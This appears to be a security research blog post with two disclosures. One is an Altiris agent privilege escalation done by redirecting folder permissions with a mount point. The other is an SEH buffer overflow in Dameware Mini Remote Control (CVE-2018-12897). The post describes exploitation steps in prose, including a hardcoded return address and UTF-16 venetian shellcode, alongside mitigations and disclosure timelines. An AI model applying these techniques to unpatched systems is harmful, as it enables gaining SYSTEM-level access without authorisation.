Here’s where the fun begins. Having ‘Everyone – Full Control’ permissions on a folder can be of great interest, but sometimes you can go down a rabbit hole that leads to nowhere, other than access to the files themselves. Nevertheless, we jumped headfirst down that rabbit hole.

It’s worth noting that once we found this behaviour, we went back to a recent vulnerability disclosure against Cylance (awesome post by Ryan Hanson incoming) to see if this type of attack would be possible here:

Here are the folder permissions that we identified on the ‘NSI’ folder. These permissions were also the same on the ‘Outbox’ folder.

We then attempted to redirect the folder using James Forshaw’s symboliclink-testing-tools, creating a mount point to another location and checking whether the files were written there, which was successful. It was also possible to use the junction tool from Sysinternals (https://docs.microsoft.com/en-us/sysinternals/). The only problem with the Sysinternals junction tool is that it requires the source folder to not exist, whereas in our case the folder was already there with ‘Everyone’ permissions. An example of this is shown below:

If we were to completely delete this folder we would not have the correct permissions to recreate this attack. James Forshaw’s toolkit allows the existing folder to be overwritten rather than starting from scratch, as shown below:

Another option for this type of attack is Windows’ built-in mklink command, but this requires elevated privileges, which would not have been possible in this situation (the point is that we’re attempting to gain elevated privileges).

To completely understand what process was overwriting these permissions, we uploaded Process Monitor from sysinternals (https://docs.microsoft.com/en-us/sysinternals/) to see what was going on under the hood. As you can see from the output below, all files and folders were getting a DACL applied by the AeXNSAgent.exe.

Analysis – Weaponisation

So how can we weaponise this? There are multiple ways you could choose to make this vulnerability exploitable, but the path of least resistance was trying to overwrite the permissions on the entire root Altiris folder (“C:\Program Files\Altiris\Altiris Agent\”) so that we could modify the service binary running under the SYSTEM account, namely AeXNSAgent.exe.

The following screenshots show the permissions applied to the ‘Altiris Agent’ folder and the AeXNSAgent.exe service binary, before the mount point was modified to overwrite the permissions:

We then created a mount point which pointed to the ‘Altiris Agent’ folder. It’s worth noting that the source folder must be empty for the redirection to be possible; since we had full permissions over every file, this was trivial to complete. The mount point was created and verified using James Forshaw’s symboliclink-testing-tools.

We then waited for the next scan to run, which was the following morning, and the next screenshot shows the outcome. As we expected, the ‘Everyone – Full Control’ permission was applied to the root folder and everything under it, including AeXNSAgent.exe.

Once we had full control over AeXNSAgent.exe we could then replace the service binary and reboot the host to obtain SYSTEM-level privileges. It is worth noting that privilege escalation vulnerabilities involving symbolic links are fairly common; James Forshaw himself has found well over twenty, as shown here:

Conclusion

This vulnerability affected all versions of the Altiris Management Agent up to and including v7.6, v8.0 and v8.1 RU7. We strongly recommend you apply all patches immediately.

If you have more ideas about exploiting this or similar vulnerabilities at runtime and/or in other ways, then please share them with the community and let us know your thoughts.

Disclosure Timeline

  • Vendor contacted – 31 May 2018
  • Vendor assigned Tracking ID – 31 May 2018
  • Vendor confirmed 60 day disclosure – 31 May 2018
  • Vendor acknowledged vulnerability in v7.6, 8.0, 8.1 RU7 – 12 June 2018
  • Vendor confirmed fix for all four releases – 16 July 2018
  • CVE issued by participating CNA – 23 July 2018
  • Vendor publicly disclosed (https://support.symantec.com/en_US/article.SYMSA1456.html) – 25 July 2018
  • Nettitude release further information – 12 September 2018

CVE-2018-12897: Solarwinds Dameware Mini Remote Control Local SEH Buffer Overflow

Dameware Mini Remote Control (MRC) is a remote administration utility allowing remote access to end user devices for a variety of purposes. You can often find it among the plethora of toolkits used by system administrators managing the IT infrastructure in organisations.

Having recently completed my OSCE and looking to use some of the skills I picked up there in the real world, I found a local buffer overflow vulnerability in the latest version (at the time of writing) of Dameware MRC (12.0.5), which has been assigned CVE-2018-12897. This vulnerability is due to insecure handling of a user input buffer, which ultimately allows for overwriting Structured Exception Handler (SEH) addresses and the subsequent hijacking of execution flow.

Below is a video demonstration of exploitation for proof of concept of this vulnerability.

Solarwinds have been contacted about this issue; they acknowledged it and have released version 12.1, which reportedly contains the fix for the vulnerability. However, at the time of writing, this version doesn’t appear to be available from the customer portal, so if you are affected by this issue it is recommended that you request it directly from customer support.

Method of Exploitation

One of the windows (AMT Settings) within the GUI has several input fields. The majority of these fields lack appropriate input sanitization, leading to crashes when entering a large amount of input (more than 3,000 characters). However, for the proof of concept, only one of these fields was used; the “Host” field under the SOCKS Proxy Settings.

As a simple test for this vulnerability, a large number of characters can be entered into the field to observe the results. Sometimes it may be necessary to fuzz input fields and parameters – an automated process of entering varying amounts of different characters in sequence in an attempt to identify unexpected behaviour – however this was not necessary in this instance. Simply entering a large number of A’s (over 2,000) or any other character would result in the application terminating unexpectedly.

Looking at this process in a debugger, it becomes clear what is happening. The input is being written to the stack and has overflown the SEH addresses. This is quickly visible by looking at the SEH chain in the debugger.

Following this process through, eventually we can see our A’s (0x41) being placed into EIP due to the corrupted SEH chain.

Interestingly though, the A’s aren’t displayed how they were entered and have been separated by null bytes (0x00). This is because the input buffer is processed as wide characters, with UTF-16 encoding. From here, the next step is to determine how many bytes are required before the overwrite happens and to find a suitable set of “POP, POP, RET” instructions. The buffer length before the overflow was identified using Metasploit’s helpful “pattern_create” and “pattern_offset” utilities, taking care to observe the bytes surrounding the overflow, as the null bytes have to be discounted. As DWRCC.EXE (the main executable) is not rebased on each execution, the instruction set found at address 0x00439D7D was chosen. The executable was compiled without common protections, including ASLR, which would otherwise have made hardcoding an address in the exploit infeasible.

The next step is to overwrite the SEH and next SEH addresses with the address of the instructions found above and the op codes for a small jump over that address. Once executed, the execution flow should then be directed into the area of memory on the stack that is under our control. For both the address and the jump, UTF-16 characters were used so as to avoid the null bytes. The payload looks like this at this point (most of the ‘A’s have been cropped for readability).

By placing a breakpoint on the first address of our “POP, POP, RET” instruction set, we can pause execution to step through and check everything is working as intended.

The breakpoint was hit, which was the first hurdle down; now we just needed to make sure it returned and executed the jump instruction.

Great, so the jump was taken and we are now executing in a controllable area of memory. This is good news! The next step is to increase the padding and place some shellcode. Due to the wide characters, the shellcode to be used needs to be UTF-16 compatible. Luckily, the alpha2 encoder in Metasploit has the ability to generate UTF-16 compatible shellcode. However, the one caveat is that it requires a register to hold the address of the beginning of the shellcode when the shellcode is executed. To achieve this, an offset would need to be calculated from an address which is unchanging on each run, independent of the operating system version.

After taking into account the offset, the calculated value could then be placed into EAX right before the shellcode executes. To do this, a technique known as “venetian shellcode” could be used to execute operations in between the null bytes to get EAX to hold the required address. For this to work, the null bytes must be consumed by other harmless operations. This concept was new to me and so I thought I would give it a go here to see how it works, using the simplest form of venetian shellcode. There are some fantastic write-ups which discuss this technique and its history, including Corelan’s tutorials and Fuzzysecurity (you can find links to both at the bottom of this post). Thanks for all your awesome work, guys! After combining everything together, we now have the following:

I won’t go into too much detail about how it all works here but if you are interested, you should be able to get an evaluation copy of the software easily enough to have a go yourself! I’m sure there are many other ways to approach this (probably more elegant ways too!).

Finally, we can copy and paste in the constructed payload both inside and outside of the debugger to see what happens.

Several different mitigations for buffer overflows exist which can be implemented during compilation. In some situations they can be bypassed, but they still offer an added layer of protection that helps prevent exploitation of buffer overflows, or at least increases its complexity. These are not new and have been around for a good while now; it’s 2018 and yet still many applications are being compiled without these protections.

32 bit vs 64 bit

Due to the differences in the way that exceptions are handled between 32-bit and 64-bit applications, only the 32-bit version appears to be exploitable to run arbitrary code. The 64-bit version can be overflowed, which will lead to a crash, but there wouldn’t be any benefit in doing this from an attacking perspective.

Windows has some inbuilt protections which, when enabled, can help protect the end user from SEH based buffer overflow attacks. One of these, known as SEHOP (Structured Exception Handler Overwrite Protection), enforces an integrity check of the SEH chain before permitting execution. It does this by placing a symbolic record at the end of the chain and, at the point when an exception is raised, checking that this record is still reachable, thereby determining the integrity of the chain. If the integrity has been impaired, it will safely terminate the process. SEHOP can be enabled via Group Policy settings.

An older protection mechanism, known as SAFESEH, can be set via a compilation flag. This works by comparing a table of known safe exception handler addresses with those in the chain before jumping to them. However, this technique has some downsides, one being the requirement to recompile binaries with this flag in order to benefit from its protection.

A personal note

Having recently passed my OSCE exam (which was an amazing experience that I fully recommend), I was looking to find something I could use my new found skill set to practise on. Finding this (while not the most exciting vulnerability) was certainly rewarding and taught me some additional techniques that I may not have otherwise come across. Much of that learning came from security professionals who have written some insanely useful and easy to follow tutorials. I want to extend a big personal thank you to all who spend their time writing these tutorials and guides. Two of the guides I used for venetian shellcode can be found below, but the entire set of guides is invaluable for exploit development.

Disclosure Process

  • 15 June 2018 – Reported vulnerability to Solarwinds
  • 25 June 2018 – Update from Solarwinds that development team would be in further contact
  • 05 July 2018 – Contacted Solarwinds again to see if there had been any updates
  • 06 August 2018 – Requested update, vendor acknowledged the vulnerability and reported that remediation work was underway
  • 13 August 2018 – Vendor contacts Nettitude to inform them that version 12.1 has been released which contains a fix for the reported issue.
  • 06 September 2018 – Public disclosure